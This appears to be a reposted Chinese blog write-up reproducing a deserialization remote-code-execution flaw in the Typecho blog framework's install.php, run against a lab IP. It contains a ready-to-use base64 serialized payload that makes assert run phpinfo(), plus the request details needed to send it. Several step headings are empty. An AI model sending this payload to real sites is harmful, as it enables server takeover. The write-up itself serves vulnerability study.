typecho框架存在反序列化漏洞,利用此漏洞可執行任意代碼
環境搭建
第一步
第二步
第三步
第三步
第四步
第五步
第六步
第七步
第八步
第九步
漏洞分析
typecho\build\install.php 檔案中 , 使用unserialize()進行反序列化 , 并使用base64進行編碼 , 序列化的內容通過 Typech_Cookie 的 get()函式獲取
ypecho_Cookie的get函式從cookie或者post中獲取引數
public static function get($key, $default = NULL)
{
$key = self::$_prefix . $key;
$value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);
return is_array($value) ? $default : $value;
}
但執行這些代碼前,需要先滿足兩個條件
漏洞復現
第一步
第二步
使用抓包工具( 此處使用Burp Suite工具 )構造惡意引數
如果Burp Suite里直接撰寫post請求不生效,可配合火狐瀏覽器的插件HacKBar
payload
finish引數
http://192.168.232.130/typecho/build/install.php?finish=1Referer
Referer: http://192.168.232.130Post請求引數內容
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUxMTc5NTIwMTtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289486.html
標籤:其他
上一篇:Web電商安全之xss學習